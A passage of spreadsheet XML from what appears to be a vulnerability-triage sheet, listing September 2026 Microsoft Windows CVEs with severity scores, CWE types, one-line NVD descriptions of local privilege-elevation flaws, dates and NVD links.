          <t>New</t>
        </is>
      </c>
      <c r="C913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69331</t>
        </is>
      </c>
      <c r="D913" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E913" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F913" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G913" s="5" t="inlineStr"/>
      <c r="H913" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I913" s="5" t="inlineStr"/>
      <c r="J913" s="5" t="inlineStr"/>
      <c r="K913" s="5" t="inlineStr"/>
      <c r="L913" s="5" t="inlineStr"/>
      <c r="M913" s="5" t="inlineStr"/>
      <c r="N913" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O913" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P913" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q913" s="5" t="inlineStr"/>
      <c r="R913" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S913" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T913" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69331</t>
        </is>
      </c>
    </row>
    <row r="914">
      <c r="A914" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B914" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69333</t>
        </is>
      </c>
      <c r="D914" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E914" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F914" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G914" s="5" t="inlineStr"/>
      <c r="H914" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I914" s="5" t="inlineStr"/>
      <c r="J914" s="5" t="inlineStr"/>
      <c r="K914" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L914" s="5" t="inlineStr"/>
      <c r="M914" s="5" t="inlineStr"/>
      <c r="N914" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O914" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P914" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q914" s="5" t="inlineStr"/>
      <c r="R914" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S914" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T914" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69333</t>
        </is>
      </c>
    </row>
    <row r="915">
      <c r="A915" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B915" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69335</t>
        </is>
      </c>
      <c r="D915" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E915" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F915" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G915" s="5" t="inlineStr"/>
      <c r="H915" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I915" s="5" t="inlineStr"/>
      <c r="J915" s="5" t="inlineStr"/>
      <c r="K915" s="5" t="inlineStr"/>
      <c r="L915" s="5" t="inlineStr"/>
      <c r="M915" s="5" t="inlineStr"/>
      <c r="N915" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O915" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P915" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q915" s="5" t="inlineStr"/>
      <c r="R915" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S915" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T915" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69335</t>
        </is>
      </c>
    </row>
    <row r="916">
      <c r="A916" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B916" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C916" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69341</t>
        </is>
      </c>
      <c r="D916" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E916" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F916" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G916" s="5" t="inlineStr"/>
      <c r="H916" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I916" s="5" t="inlineStr"/>
      <c r="J916" s="5" t="inlineStr"/>
      <c r="K916" s="5" t="inlineStr"/>
      <c r="L916" s="5" t="inlineStr"/>
      <c r="M916" s="5" t="inlineStr"/>
      <c r="N916" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O916" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P916" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q916" s="5" t="inlineStr"/>
      <c r="R916" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S916" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T916" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69341</t>
        </is>
      </c>
    </row>
    <row r="917">
      <c r="A917" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B917" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69362</t>
        </is>
      </c>
      <c r="D917" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E917" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F917" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G917" s="5" t="inlineStr"/>
      <c r="H917" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I917" s="5" t="inlineStr"/>
      <c r="J917" s="5" t="inlineStr"/>
      <c r="K917" s="5" t="inlineStr"/>
      <c r="L917" s="5" t="inlineStr"/>
      <c r="M917" s="5" t="inlineStr"/>
      <c r="N917" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O917" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P917" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q917" s="5" t="inlineStr"/>
      <c r="R917" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S917" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T917" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69362</t>
        </is>
      </c>
    </row>
    <row r="918">
      <c r="A918" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B918" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69379</t>
        </is>
      </c>
      <c r="D918" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E918" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F918" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G918" s="5" t="inlineStr"/>
      <c r="H918" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I918" s="5" t="inlineStr"/>
      <c r="J918" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K918" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L918" s="5" t="inlineStr"/>
      <c r="M918" s="5" t="inlineStr"/>
      <c r="N918" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O918" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P918" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q918" s="5" t="inlineStr"/>
      <c r="R918" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S918" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T918" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69379</t>
        </is>
      </c>
    </row>
    <row r="919">
      <c r="A919" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B919" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69383</t>
        </is>
      </c>
      <c r="D919" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E919" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F919" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G919" s="5" t="inlineStr"/>
      <c r="H919" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I919" s="5" t="inlineStr"/>
      <c r="J919" s="5" t="inlineStr"/>
      <c r="K919" s="5" t="inlineStr"/>
      <c r="L919" s="5" t="inlineStr"/>
      <c r="M919" s="5" t="inlineStr"/>
      <c r="N919" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O919" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P919" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q919" s="5" t="inlineStr"/>
      <c r="R919" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S919" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T919" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69383</t>
        </is>
      </c>
    </row>
    <row r="920">
      <c r="A920" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B920" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69385</t>
        </is>
      </c>
      <c r="D920" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E920" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F920" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G920" s="5" t="inlineStr"/>
      <c r="H920" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I920" s="5" t="inlineStr"/>
      <c r="J920" s="5" t="inlineStr"/>
      <c r="K920" s="5" t="inlineStr"/>
      <c r="L920" s="5" t="inlineStr"/>
      <c r="M920" s="5" t="inlineStr"/>
      <c r="N920" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O920" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P920" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q920" s="5" t="inlineStr"/>
      <c r="R920" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S920" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T920" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69385</t>
        </is>
      </c>
    </row>
    <row r="921">
      <c r="A921" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B921" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69388</t>
        </is>
      </c>
      <c r="D921" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E921" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F921" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G921" s="5" t="inlineStr"/>
      <c r="H921" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I921" s="5" t="inlineStr"/>
      <c r="J921" s="5" t="inlineStr"/>
      <c r="K921" s="5" t="inlineStr"/>
      <c r="L921" s="5" t="inlineStr"/>
      <c r="M921" s="5" t="inlineStr"/>
      <c r="N921" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O921" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P921" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q921" s="5" t="inlineStr"/>
      <c r="R921" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S921" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T921" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69388</t>
        </is>
      </c>
    </row>
    <row r="922">
      <c r="A922" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B922" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69394</t>
        </is>
      </c>
      <c r="D922" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E922" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F922" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G922" s="5" t="inlineStr"/>
      <c r="H922" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I922" s="5" t="inlineStr"/>
      <c r="J922" s="5" t="inlineStr"/>
      <c r="K922" s="5" t="inlineStr"/>
      <c r="L922" s="5" t="inlineStr"/>
      <c r="M922" s="5" t="inlineStr"/>
      <c r="N922" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O922" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P922" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q922" s="5" t="inlineStr"/>
      <c r="R922" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S922" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T922" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69394</t>
        </is>
      </c>
    </row>
    <row r="923">
      <c r="A923" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B923" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69398</t>
        </is>
      </c>
      <c r="D923" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E923" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F923" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G923" s="5" t="inlineStr"/>
      <c r="H923" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I923" s="5" t="inlineStr"/>
      <c r="J923" s="5" t="inlineStr"/>
      <c r="K923" s="5" t="inlineStr"/>
      <c r="L923" s="5" t="inlineStr"/>
      <c r="M923" s="5" t="inlineStr"/>
      <c r="N923" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O923" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P923" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q923" s="5" t="inlineStr"/>
      <c r="R923" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-415</t>
        </is>
      </c>
      <c r="S923" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T923" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69398</t>
        </is>
      </c>
    </row>
    <row r="924">
      <c r="A924" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B924" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69401</t>
        </is>
      </c>
      <c r="D924" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E924" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F924" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G924" s="5" t="inlineStr"/>
      <c r="H924" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I924" s="5" t="inlineStr"/>
      <c r="J924" s="5" t="inlineStr"/>
      <c r="K924" s="5" t="inlineStr"/>
      <c r="L924" s="5" t="inlineStr"/>
      <c r="M924" s="5" t="inlineStr"/>
      <c r="N924" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O924" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P924" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q924" s="5" t="inlineStr"/>
      <c r="R924" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S924" s="5" t="inlineStr">
        <is>
          <t>Use after free in Audio Video Control Transport Protocol allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T924" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69401</t>
        </is>
      </c>
    </row>
    <row r="925">
      <c r="A925" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B925" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C925" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69404</t>
        </is>
      </c>
      <c r="D925" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E925" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F925" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G925" s="5" t="inlineStr"/>
      <c r="H925" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I925" s="5" t="inlineStr"/>
      <c r="J925" s="5" t="inlineStr"/>
      <c r="K925" s="5" t="inlineStr"/>
      <c r="L925" s="5" t="inlineStr"/>
      <c r="M925" s="5" t="inlineStr"/>
      <c r="N925" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O925" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P925" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q925" s="5" t="inlineStr"/>
      <c r="R925" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S925" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T925" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69404</t>
        </is>
      </c>
    </row>
    <row r="926">
      <c r="A926" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B926" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69410</t>
        </is>
      </c>
      <c r="D926" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E926" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F926" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G926" s="5" t="inlineStr"/>
      <c r="H926" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I926" s="5" t="inlineStr"/>
      <c r="J926" s="5" t="inlineStr"/>
      <c r="K926" s="5" t="inlineStr"/>
      <c r="L926" s="5" t="inlineStr"/>
      <c r="M926" s="5" t="inlineStr"/>
      <c r="N926" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O926" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P926" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q926" s="5" t="inlineStr"/>
      <c r="R926" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S926" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T926" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69410</t>
        </is>
      </c>
    </row>
    <row r="927">
      <c r="A927" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B927" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69413</t>
        </is>
      </c>
      <c r="D927" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E927" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F927" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G927" s="5" t="inlineStr"/>
      <c r="H927" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I927" s="5" t="inlineStr"/>
      <c r="J927" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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27" s="5" t="inlineStr"/>
      <c r="M927" s="5" t="inlineStr"/>
      <c r="N927" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O927" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P927" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q927" s="5" t="inlineStr"/>
      <c r="R927" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S927" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T927" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69413</t>
        </is>
      </c>
    </row>
    <row r="928">
      <c r="A928" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B928" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69422</t>
        </is>
      </c>
      <c r="D928" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E928" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F928" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G928" s="5" t="inlineStr"/>
      <c r="H928" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I928" s="5" t="inlineStr"/>
      <c r="J928" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K928" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L928" s="5" t="inlineStr"/>
      <c r="M928" s="5" t="inlineStr"/>
      <c r="N928" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O928" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P928" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q928" s="5" t="inlineStr"/>
      <c r="R928" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S928" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T928" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69422</t>
        </is>
      </c>
    </row>
    <row r="929">
      <c r="A929" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B929" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69430</t>
        </is>
      </c>
      <c r="D929" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E929" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F929" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G929" s="5" t="inlineStr"/>
      <c r="H929" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I929" s="5" t="inlineStr"/>
      <c r="J929" s="5" t="inlineStr"/>
      <c r="K929" s="5" t="inlineStr"/>
      <c r="L929" s="5" t="inlineStr"/>
      <c r="M929" s="5" t="inlineStr"/>
      <c r="N929" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O929" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P929" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q929" s="5" t="inlineStr"/>
      <c r="R929" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S929" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Embedded Mode Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T929" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69430</t>
        </is>
      </c>
    </row>
    <row r="930">
      <c r="A930" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B930" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69440</t>
        </is>
      </c>
      <c r="D930" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E930" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F930" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G930" s="5" t="inlineStr"/>
      <c r="H930" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I930" s="5" t="inlineStr"/>
      <c r="J930" s="5" t="inlineStr"/>
      <c r="K930" s="5" t="inlineStr"/>
      <c r="L930" s="5" t="inlineStr"/>
      <c r="M930" s="5" t="inlineStr"/>
      <c r="N930" s="5" t="inlineStr">
        <is>
